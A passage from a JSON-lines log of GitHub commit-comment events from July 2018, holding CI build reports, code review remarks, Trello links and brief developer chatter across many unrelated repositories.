Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T22:41:28Z"}
{"id":"7952977233","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29677939,"position":null,"line":null,"path":null,"commit_id":"4396b088312ffcbcbdf42108b63c3975636226bd","created_at":"2018-07-11T22:42:40Z","updated_at":"2018-07-11T22:42:40Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/82/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/82//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/4396b088312ffcbcbdf42108b63c3975636226bd/82/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/4396b088312ffcbcbdf42108b63c3975636226bd/82/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/4396b088312ffcbcbdf42108b63c3975636226bd/82/jenkins-results/generator-diff/index.html) (only version changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/4396b088312ffcbcbdf42108b63c3975636226bd/82/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-11T22:42:40Z"}
{"id":"7952978668","type":"CommitCommentEvent","actor":{"login":"Vee85"},"repo":{"name":"Vee85/GIMP_plugins"},"payload":{"comment":{"id":29677942,"position":null,"line":null,"path":null,"commit_id":"10e8fd5293efd9e2581963892a4b4740bc97d6c0","created_at":"2018-07-11T22:43:07Z","updated_at":"2018-07-11T22:43:07Z","author_association":"OWNER","body":"Also added custom color map for a smallarea region.\r\nCCMarker class has become nested class of BDrawDial class.\r\n"}},"created_at":"2018-07-11T22:43:07Z"}
{"id":"7952981466","type":"CommitCommentEvent","actor":{"login":"LeeHowes"},"repo":{"name":"kirkshoop/executors-bryce"},"payload":{"comment":{"id":29677951,"position":52,"line":456,"path":"wording.md","commit_id":"8524c8f9220b5a742c74d9fee658b3ada2fd6154","created_at":"2018-07-11T22:43:58Z","updated_at":"2018-07-11T22:43:58Z","author_association":"NONE","body":"We might want to describe this loop using std::parallel_for(execution::policy::unseq, \r\n\r\nor whatever the right syntax is. Just to make it clear that the ordering of that loop is allowed to be relaxed and does not make strong forward progress guarantees."}},"created_at":"2018-07-11T22:43:58Z"}
{"id":"7952982548","type":"CommitCommentEvent","actor":{"login":"yakov116"},"repo":{"name":"sindresorhus/refined-github"},"payload":{"comment":{"id":29677953,"position":null,"line":null,"path":null,"commit_id":"a60638ad250c067e9f5753e3e82906a44eb6099b","created_at":"2018-07-11T22:44:18Z","updated_at":"2018-07-11T22:44:18Z","author_association":"CONTRIBUTOR","body":"Thanks you!"}},"created_at":"2018-07-11T22:44:18Z"}
{"id":"7952983027","type":"CommitCommentEvent","actor":{"login":"leifwickland"},"repo":{"name":"pureconfig/pureconfig"},"payload":{"comment":{"id":29677956,"position":19,"line":71,"path":"modules/yaml/src/main/scala/pureconfig/module/yaml/package.scala","commit_id":"68f76e3f3b75e97ed8bfe32d3cfe6a80eb83c1a7","created_at":"2018-07-11T22:44:27Z","updated_at":"2018-07-11T22:44:27Z","author_association":"COLLABORATOR","body":"Do you want to wrap this in a `Try` to prevent the exception from propagating like you had previously done on line 81?"}},"created_at":"2018-07-11T22:44:27Z"}
{"id":"7952984616","type":"CommitCommentEvent","actor":{"login":"oBusk"},"repo":{"name":"oBusk/typescript-library-boilerplate"},"payload":{"comment":{"id":29677959,"position":null,"line":null,"path":null,"commit_id":"6c9ae10842438e889160a278940918c1c5de8a04","created_at":"2018-07-11T22:44:57Z","updated_at":"2018-07-11T22:44:57Z","author_association":"OWNER","body":"@maxdavidson Oh! I obviously wouldn't want to be uncool! \r\nI don't have extensive knowledge of licensing and rights and was fiddling with this the other day without doing the necessary research. I had a look now and following the recommendations on multiple sources ([1](https://softwareengineering.stackexchange.com/a/277699/310255), [2](https://opensource.stackexchange.com/a/6126), [3](https://www.quora.com/What-is-considered-good-etiquette-when-creating-a-new-node-module-from-an-existing-forked-module/answer/Juho-Veps%C3%A4l%C3%A4inen)) I've [updated the related files](https://github.com/obusk/typescript-library-boilerplate/compare/6c9ae10842438e889160a278940918c1c5de8a04...791eae9f79f71ca27babf61d094f1647bd57b19a), please do have a look, if you have time, if everything looks to be correct according to licensing and ettiquette.\r\n\r\nPlease accept my biggest apologies and thank you for correcting my mistake so that I learn.\r\n\r\nI was actually thinking about opening PRs for some of the changes at some point but haven't gotten around to it yet. When I get around to it I'll look forward to see what you think. "}},"created_at":"2018-07-11T22:44:57Z"}
{"id":"7952994856","type":"CommitCommentEvent","actor":{"login":"w4nd3rs0n"},"repo":{"name":"w4nd3rs0n/Jiraiya"},"payload":{"comment":{"id":29677987,"position":1,"line":1,"path":"wanderson.txt","commit_id":"43936dfebd5f4316c7b5369f09b7a989e67ce2d6","created_at":"2018-07-11T22:48:10Z","updated_at":"2018-07-11T22:48:10Z","author_association":"OWNER","body":"Modificado sobrenome do usuário"}},"created_at":"2018-07-11T22:48:10Z"}
{"id":"7952996170","type":"CommitCommentEvent","actor":{"login":"w4nd3rs0n"},"repo":{"name":"w4nd3rs0n/Jiraiya"},"payload":{"comment":{"id":29677992,"position":null,"line":null,"path":null,"commit_id":"43936dfebd5f4316c7b5369f09b7a989e67ce2d6","created_at":"2018-07-11T22:48:34Z","updated_at":"2018-07-11T22:48:34Z","author_association":"OWNER","body":"Esse commit foi necessário?"}},"created_at":"2018-07-11T22:48:34Z"}
{"id":"7952999287","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29678001,"position":null,"line":null,"path":null,"commit_id":"4da11e696a1502773bfef27ff794ac5dceabaaf3","created_at":"2018-07-11T22:49:32Z","updated_at":"2018-07-11T22:49:32Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T22:49:32Z"}
{"id":"7953004537","type":"CommitCommentEvent","actor":{"login":"ruippeixotog"},"repo":{"name":"pureconfig/pureconfig"},"payload":{"comment":{"id":29678010,"position":19,"line":71,"path":"modules/yaml/src/main/scala/pureconfig/module/yaml/package.scala","commit_id":"68f76e3f3b75e97ed8bfe32d3cfe6a80eb83c1a7","created_at":"2018-07-11T22:51:11Z","updated_at":"2018-07-11T22:51:11Z","author_association":"MEMBER","body":"This wrapper doesn't handle any exception; I delegate that to `handleYamlErrors`, since it knows how to build domain failures from exceptions.\r\n"}},"created_at":"2018-07-11T22:51:11Z"}
{"id":"7953006648","type":"CommitCommentEvent","actor":{"login":"asgdf"},"repo":{"name":"nikolas/github-avatars"},"payload":{"comment":{"id":29678016,"position":null,"line":null,"path":null,"commit_id":"42659638c50340f530eea7248526d89b129cb8a1","created_at":"2018-07-11T22:51:51Z","updated_at":"2018-07-11T22:51:51Z","author_association":"NONE","body":"Huh what, what is this and what am I doing in there"}},"created_at":"2018-07-11T22:51:51Z"}
{"id":"7953013681","type":"CommitCommentEvent","actor":{"login":"byorgey"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29678030,"position":26,"line":76,"path":"docs/tutorial/polymorphism.rst","commit_id":"cd17073e13c5199077323d822861094066525593","created_at":"2018-07-11T22:54:04Z","updated_at":"2018-07-11T22:54:04Z","author_association":"MEMBER","body":"What on earth happened here (below)?"}},"created_at":"2018-07-11T22:54:04Z"}
{"id":"7953016209","type":"CommitCommentEvent","actor":{"login":"inyono"},"repo":{"name":"serlo-org/athene2"},"payload":{"comment":{"id":29678033,"position":10,"line":null,"path":"src/module/Ui/templates/entity/view/video.twig","commit_id":"c1a566ef1e33eb45aae9d30293e3c0fe4b89e4a9","created_at":"2018-07-11T22:54:47Z","updated_at":"2018-07-11T22:54:47Z","author_association":"MEMBER","body":"Exactly. Kinda exploiting that `split` will only return one element if there is no match. Not a big fan of putting that logic into twig templates, but unfortunately, we don't have an extra controller for videos (and I don't really want to create a view helper for that). If you have a better idea, shoot :)"}},"created_at":"2018-07-11T22:54:47Z"}
{"id":"7953020870","type":"CommitCommentEvent","actor":{"login":"geek1011"},"repo":{"name":"geek1011/kobopatch-patches"},"payload":{"comment":{"id":29678045,"position":null,"line":null,"path":null,"commit_id":"016fe9ecdbd6c990f3e64b91ceb1a326b2ae3511","created_at":"2018-07-11T22:56:10Z","updated_at":"2018-07-11T22:56:10Z","author_association":"OWNER","body":"That was confusing! Two people with a username starting with a `j` sending patches to me at the same time. I'll make sure not to mix them up next time."}},"created_at":"2018-07-11T22:56:10Z"}
{"id":"7953022514","type":"CommitCommentEvent","actor":{"login":"SanjitKal"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29678047,"position":26,"line":76,"path":"docs/tutorial/polymorphism.rst","commit_id":"cd17073e13c5199077323d822861094066525593","created_at":"2018-07-11T22:56:41Z","updated_at":"2018-07-11T22:56:41Z","author_association":"COLLABORATOR","body":"Ah.. I made some changes to the docs on the master branch, and checked to make sure it looked ok, but I was probably looking at the poly-types version on readthedocs. Thanks for the catch!"}},"created_at":"2018-07-11T22:56:41Z"}
{"id":"7953025872","type":"CommitCommentEvent","actor":{"login":"tysonwilliams"},"repo":{"name":"jeffyjkang/Redux-Swapi"},"payload":{"comment":{"id":29678054,"position":39,"line":44,"path":"src/components/App.js","commit_id":"b14764c77d2ad58e85985a5a04b8a77584f908f2","created_at":"2018-07-11T22:57:44Z","updated_at":"2018-07-11T22:57:44Z","author_association":"NONE","body":"@jeffyjkang what action(s) would go here? HINT: src/actions/index.js - line 16\r\nhttps://github.com/jeffyjkang/Redux-Swapi/blob/b14764c77d2ad58e85985a5a04b8a77584f908f2/src/actions/index.js#L16"}},"created_at":"2018-07-11T22:57:44Z"}
{"id":"7953027512","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29678058,"position":null,"line":null,"path":null,"commit_id":"04ad2bcff201f0ac5a19d3c6b416c6a54914567e","created_at":"2018-07-11T22:58:17Z","updated_at":"2018-07-11T22:58:17Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - i386-Windows-7-VisualStudio-14: OK (2933 of 2934 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 623\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T22:58:17Z"}
{"id":"7953028995","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Swapi"},"payload":{"comment":{"id":29678059,"position":null,"line":null,"path":null,"commit_id":"0eaa62dd20057ddf6b8c58467539310dee69bcdb","created_at":"2018-07-11T22:58:44Z","updated_at":"2018-07-11T22:58:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Get axios to work](https://trello.com/c/lSfqNqZo/5-get-axios-to-work)"}},"created_at":"2018-07-11T22:58:44Z"}
{"id":"7953029472","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Swapi"},"payload":{"comment":{"id":29678060,"position":null,"line":null,"path":null,"commit_id":"7dbd27f673f062480a7b4354ef07405dbb10e206","created_at":"2018-07-11T22:58:54Z","updated_at":"2018-07-11T22:58:54Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make the character list appear and loading state work](https://trello.com/c/aqX5uve7/7-make-the-character-list-appear-and-loading-state-work)"}},"created_at":"2018-07-11T22:58:54Z"}
{"id":"7953030035","type":"CommitCommentEvent","actor":{"login":"juanpicado"},"repo":{"name":"verdaccio/verdaccio"},"payload":{"comment":{"id":29678061,"position":null,"line":null,"path":null,"commit_id":"54da8327ab20cd79eabe91acc50a2a215a8478b0","created_at":"2018-07-11T22:59:05Z","updated_at":"2018-07-11T22:59:05Z","author_association":"MEMBER","body":"@robert1312 ?"}},"created_at":"2018-07-11T22:59:05Z"}
{"id":"7953030627","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Swapi"},"payload":{"comment":{"id":29678064,"position":null,"line":null,"path":null,"commit_id":"617e6e501114db84f7eb8f11e8029e2eb4ac9739","created_at":"2018-07-11T22:59:15Z","updated_at":"2018-07-11T22:59:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Give the components proper props via redux](https://trello.com/c/4RIwAP4f/6-give-the-components-proper-props-via-redux)"}},"created_at":"2018-07-11T22:59:15Z"}
{"id":"7953031132","type":"CommitCommentEvent","actor":{"login":"Sam0711er"},"repo":{"name":"Sam0711er/Shortcuts"},"payload":{"comment":{"id":29678066,"position":null,"line":null,"path":null,"commit_id":"efd0b97d833cb9f8508112aa9ec3b5303039fbeb","created_at":"2018-07-11T22:59:25Z","updated_at":"2018-07-11T22:59:25Z","author_association":"OWNER","body":"Yeay"}},"created_at":"2018-07-11T22:59:25Z"}
{"id":"7953031470","type":"CommitCommentEvent","actor":{"login":"daejunpark"},"repo":{"name":"runtimeverification/verified-smart-contracts"},"payload":{"comment":{"id":29678069,"position":1,"line":31,"path":"casper/README.md","commit_id":"36bee5df4f6feff1e33420db83f71dba737d3121","created_at":"2018-07-11T22:59:32Z","updated_at":"2018-07-11T22:59:32Z","author_association":"COLLABORATOR","body":"good catch!"}},"created_at":"2018-07-11T22:59:32Z"}
{"id":"7953032120","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Swapi"},"payload":{"comment":{"id":29678071,"position":null,"line":null,"path":null,"commit_id":"2eb464de0846ea5678cfc60e0ffd3f703c5c4934","created_at":"2018-07-11T22:59:44Z","updated_at":"2018-07-11T22:59:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Get axios to work](https://trello.com/c/lSfqNqZo/5-get-axios-to-work)"}},"created_at":"2018-07-11T22:59:44Z"}
{"id":"7953035546","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29678087,"position":null,"line":null,"path":null,"commit_id":"df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6","created_at":"2018-07-11T23:00:43Z","updated_at":"2018-07-11T23:00:43Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-11T23:00:43Z"}
{"id":"7953036168","type":"CommitCommentEvent","actor":{"login":"sipa"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29678088,"position":15,"line":null,"path":"src/validation.cpp","commit_id":"691bec8bec6a9e53b8bade50e261e16e702f47d2","created_at":"2018-07-11T23:00:54Z","updated_at":"2018-07-11T23:00:54Z","author_association":"MEMBER","body":"Alternatively use strprintf?"}},"created_at":"2018-07-11T23:00:54Z"}
{"id":"7953037123","type":"CommitCommentEvent","actor":{"login":"cletusw"},"repo":{"name":"elix/elix"},"payload":{"comment":{"id":29678090,"position":null,"line":null,"path":null,"commit_id":"a8aa4939500e845ed6544c4aa3a179ab321044b1","created_at":"2018-07-11T23:01:11Z","updated_at":"2018-07-11T23:01:11Z","author_association":"CONTRIBUTOR","body":"I'll submit a PR for keyCode -> key :-)"}},"created_at":"2018-07-11T23:01:11Z"}
{"id":"7953040056","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29678096,"position":null,"line":null,"path":null,"commit_id":"df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6","created_at":"2018-07-11T23:02:05Z","updated_at":"2018-07-11T23:02:05Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T23:02:05Z"}
{"id":"7953049826","type":"CommitCommentEvent","actor":{"login":"davidoskky"},"repo":{"name":"davidoskky/grocy"},"payload":{"comment":{"id":29678125,"position":null,"line":null,"path":null,"commit_id":"882a3545e5b232fd132e6e36f7ca83e83e8dec4f","created_at":"2018-07-11T23:05:12Z","updated_at":"2018-07-11T23:05:12Z","author_association":"OWNER","body":"Added Italian translation"}},"created_at":"2018-07-11T23:05:12Z"}
{"id":"7953052372","type":"CommitCommentEvent","actor":{"login":"mkubecek"},"repo":{"name":"mkubecek/vmware-host-modules"},"payload":{"comment":{"id":29678132,"position":null,"line":null,"path":null,"commit_id":"562121d7bc0606a104e876d77fd117223ee42ac3","created_at":"2018-07-11T23:06:00Z","updated_at":"2018-07-11T23:06:00Z","author_association":"OWNER","body":"The issue you refer to is just another out-of-tree driver running into the same problem as vmmon here. You cannot use the same patch; you could patch rtl8812au driver in a similar way but there is no reason to as someone else has already done this: see pull request #242 in that project."}},"created_at":"2018-07-11T23:06:00Z"}
{"id":"7953052746","type":"CommitCommentEvent","actor":{"login":"byorgey"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29678134,"position":3,"line":499,"path":"src/Disco/Typecheck.hs","commit_id":"3899a5214a3409166a75a0456cf43ab8740c5706","created_at":"2018-07-11T23:06:08Z","updated_at":"2018-07-11T23:06:08Z","author_association":"MEMBER","body":"This is not quite correct.  Note that in the line of code above, `sequence :: [Maybe Type] -> Maybe [Type]`; it returns `Just` if *all* the types were `Just`, and `Nothing` otherwise.  In other words, the `Nothing` case means that *at least one* of the types was `Nothing`, for example, as in `\\x (y:N) (z:Z). ...` .  Since the `x` has no type annotation `sequence (map unembed mtys)` would result in `Nothing`.\r\n\r\nIn the code below you generate fresh type variables for *all* the arguments; this works great if none of them had types to begin with, but if some of them did have types then those types are simply ignored.  For example:\r\n```\r\nDisco> :type (\\x (y:Nat). x - y)\r\nλ x (y : ℕ). x - y : ℤ → ℤ → ℤ\r\n```\r\nAs you can see, it infers the type `ℤ → ℤ → ℤ`, which would be correct for `λ x y. x - y`, but because of the type annotation on `y` it should be a type error instead.\r\n\r\nI think what we should actually do is get rid of the `case` on `sequence (map unembed mtys)`; we only needed it before to distinguish the cases we could handle from the cases we couldn't. But now we don't need it since we can handle all the cases. Just take `mtys` and turn each `Nothing` into a fresh type variable, and then proceed from there."}},"created_at":"2018-07-11T23:06:08Z"}
{"id":"7953052873","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29678136,"position":null,"line":null,"path":null,"commit_id":"c903bb5e6b72fd9cd42f56602a9562eb5a5534d6","created_at":"2018-07-11T23:06:10Z","updated_at":"2018-07-11T23:06:10Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T23:06:10Z"}
{"id":"7953054082","type":"CommitCommentEvent","actor":{"login":"Xaldin8"},"repo":{"name":"Xaldin8/GlieseStation"},"payload":{"comment":{"id":29678141,"position":null,"line":null,"path":null,"commit_id":"3a443232de6053447997ea2676b6057f3183915a","created_at":"2018-07-11T23:06:34Z","updated_at":"2018-07-11T23:06:34Z","author_association":"OWNER","body":"Correction, this does the EXACT OPPOSITE."}},"created_at":"2018-07-11T23:06:34Z"}
{"id":"7953057850","type":"CommitCommentEvent","actor":{"login":"victorstati"},"repo":{"name":"victorstati/github-master"},"payload":{"comment":{"id":29678151,"position":10,"line":10,"path":"contato.html","commit_id":"e23d5ce94705ffb62bf7c87c9a2d8a9a3568f653","created_at":"2018-07-11T23:07:46Z","updated_at":"2018-07-11T23:07:46Z","author_association":"OWNER","body":"Contato do site"}},"created_at":"2018-07-11T23:07:46Z"}
{"id":"7953058532","type":"CommitCommentEvent","actor":{"login":"victorstati"},"repo":{"name":"victorstati/github-master"},"payload":{"comment":{"id":29678152,"position":null,"line":null,"path":null,"commit_id":"e23d5ce94705ffb62bf7c87c9a2d8a9a3568f653","created_at":"2018-07-11T23:08:01Z","updated_at":"2018-07-11T23:08:01Z","author_association":"OWNER","body":"Troca do paragrafo para Contato do site"}},"created_at":"2018-07-11T23:08:01Z"}
{"id":"7953061355","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29678164,"position":null,"line":null,"path":null,"commit_id":"46e8b15a71dd902baba97d228c03c46ae0e4c860","created_at":"2018-07-11T23:08:57Z","updated_at":"2018-07-11T23:08:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [019 - Implementar Persistencia EnderecoConsulta na Base de Dados](https://trello.com/c/5T4jSaOv/25-019-implementar-persistencia-enderecoconsulta-na-base-de-dados)"}},"created_at":"2018-07-11T23:08:57Z"}
{"id":"7953062027","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29678165,"position":null,"line":null,"path":null,"commit_id":"2d2500e8b79ba133163850650931b88fc3a6fb79","created_at":"2018-07-11T23:09:10Z","updated_at":"2018-07-11T23:09:10Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [019 - Implementar Persistencia EnderecoConsulta na Base de Dados](https://trello.com/c/5T4jSaOv/25-019-implementar-persistencia-enderecoconsulta-na-base-de-dados)"}},"created_at":"2018-07-11T23:09:10Z"}
{"id":"7953062054","type":"CommitCommentEvent","actor":{"login":"mah007"},"repo":{"name":"msaid251/odoo"},"payload":{"comment":{"id":29678166,"position":null,"line":null,"path":null,"commit_id":"02c78308e3608b3b335ba26d14bfdc2e728a1a54","created_at":"2018-07-11T23:09:10Z","updated_at":"2018-07-11T23:09:10Z","author_association":"NONE","body":"فين الكردت بتاعي انا كمان ؟؟\r\n\r\n"}},"created_at":"2018-07-11T23:09:10Z"}
{"id":"7953062301","type":"CommitCommentEvent","actor":{"login":"victorstati"},"repo":{"name":"victorstati/github-master"},"payload":{"comment":{"id":29678168,"position":null,"line":null,"path":null,"commit_id":"e23d5ce94705ffb62bf7c87c9a2d8a9a3568f653","created_at":"2018-07-11T23:09:15Z","updated_at":"2018-07-11T23:09:15Z","author_association":"OWNER","body":"A alteração será realizada\r\n"}},"created_at":"2018-07-11T23:09:15Z"}
{"id":"7953062386","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29678169,"position":null,"line":null,"path":null,"commit_id":"c899800a7d25e8a9351f48169c9623f5f23caabf","created_at":"2018-07-11T23:09:16Z","updated_at":"2018-07-11T23:09:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [019 - Implementar Persistencia EnderecoConsulta na Base de Dados](https://trello.com/c/5T4jSaOv/25-019-implementar-persistencia-enderecoconsulta-na-base-de-dados)"}},"created_at":"2018-07-11T23:09:16Z"}
{"id":"7953064611","type":"CommitCommentEvent","actor":{"login":"lee1043"},"repo":{"name":"PCMDI/pcmdi_metrics"},"payload":{"comment":{"id":29678177,"position":null,"line":null,"path":null,"commit_id":"02fd8c28b9b8c9332933a30efcb96cb209ed2029","created_at":"2018-07-11T23:10:01Z","updated_at":"2018-07-11T23:10:01Z","author_association":"CONTRIBUTOR","body":"Oh no... accidentally pushed to master.... sorry "}},"created_at":"2018-07-11T23:10:01Z"}
{"id":"7953066669","type":"CommitCommentEvent","actor":{"login":"lee1043"},"repo":{"name":"PCMDI/pcmdi_metrics"},"payload":{"comment":{"id":29678183,"position":null,"line":null,"path":null,"commit_id":"02fd8c28b9b8c9332933a30efcb96cb209ed2029","created_at":"2018-07-11T23:10:43Z","updated_at":"2018-07-11T23:10:43Z","author_association":"CONTRIBUTOR","body":"@doutriaux1 @gleckler1 how I can push this back? "}},"created_at":"2018-07-11T23:10:43Z"}
{"id":"7953070210","type":"CommitCommentEvent","actor":{"login":"PatMurrayDEV"},"repo":{"name":"kylesethgray/Share-Your-Rings"},"payload":{"comment":{"id":29678190,"position":null,"line":null,"path":null,"commit_id":"ceb4398feb4b21267f8f2b79a7a7e1908011a79d","created_at":"2018-07-11T23:11:55Z","updated_at":"2018-07-11T23:11:55Z","author_association":"NONE","body":"omg"}},"created_at":"2018-07-11T23:11:55Z"}
{"id":"7953071222","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29678197,"position":null,"line":null,"path":null,"commit_id":"b71994fc49de43bf33cd1e2acda63e4086723fae","created_at":"2018-07-11T23:12:14Z","updated_at":"2018-07-11T23:12:14Z","author_association":"OWNER","body":"Now, `remove_item` works similarly to `add_item`. A win for consistency to be sure"}},"created_at":"2018-07-11T23:12:14Z"}
{"id":"7953073721","type":"CommitCommentEvent","actor":{"login":"kylesethgray"},"repo":{"name":"kylesethgray/Share-Your-Rings"},"payload":{"comment":{"id":29678204,"position":null,"line":null,"path":null,"commit_id":"ceb4398feb4b21267f8f2b79a7a7e1908011a79d","created_at":"2018-07-11T23:13:09Z","updated_at":"2018-07-11T23:13:09Z","author_association":"OWNER","body":"pat no"}},"created_at":"2018-07-11T23:13:09Z"}
{"id":"7953073882","type":"CommitCommentEvent","actor":{"login":"leifwickland"},"repo":{"name":"pureconfig/pureconfig"},"payload":{"comment":{"id":29678205,"position":19,"line":71,"path":"modules/yaml/src/main/scala/pureconfig/module/yaml/package.scala","commit_id":"68f76e3f3b75e97ed8bfe32d3cfe6a80eb83c1a7","created_at":"2018-07-11T23:13:11Z","updated_at":"2018-07-11T23:13:11Z","author_association":"COLLABORATOR","body":"Sorry. I was only talking about the `resource.close()` part of it, analogous to `Try(ioReader.close())` as was previously on line 81.\r\n\r\n"}},"created_at":"2018-07-11T23:13:11Z"}
{"id":"7953073891","type":"CommitCommentEvent","actor":{"login":"kylesethgray"},"repo":{"name":"kylesethgray/Share-Your-Rings"},"payload":{"comment":{"id":29678206,"position":null,"line":null,"path":null,"commit_id":"ceb4398feb4b21267f8f2b79a7a7e1908011a79d","created_at":"2018-07-11T23:13:12Z","updated_at":"2018-07-11T23:13:12Z","author_association":"OWNER","body":"pat plz"}},"created_at":"2018-07-11T23:13:12Z"}
{"id":"7953074056","type":"CommitCommentEvent","actor":{"login":"adamgarza"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29678208,"position":6,"line":19,"path":"contrib/zpages/build.gradle","commit_id":"48f9df44957794e14680e7587d4865279b521251","created_at":"2018-07-11T23:13:15Z","updated_at":"2018-07-11T23:13:15Z","author_association":"OWNER","body":"I added the sourceSets above and I see it does generates `/contrib/zpages/build/resources/main/style.css`.\r\nIs this the proper directory? I am still unable to call in the external CSS (line 248 @ `contrib/zpages/src/main/java/io/opencensus/contrib/zpages/RpczZPageHandler.java`).\r\nDo you see any possible causes? @songy23"}},"created_at":"2018-07-11T23:13:15Z"}
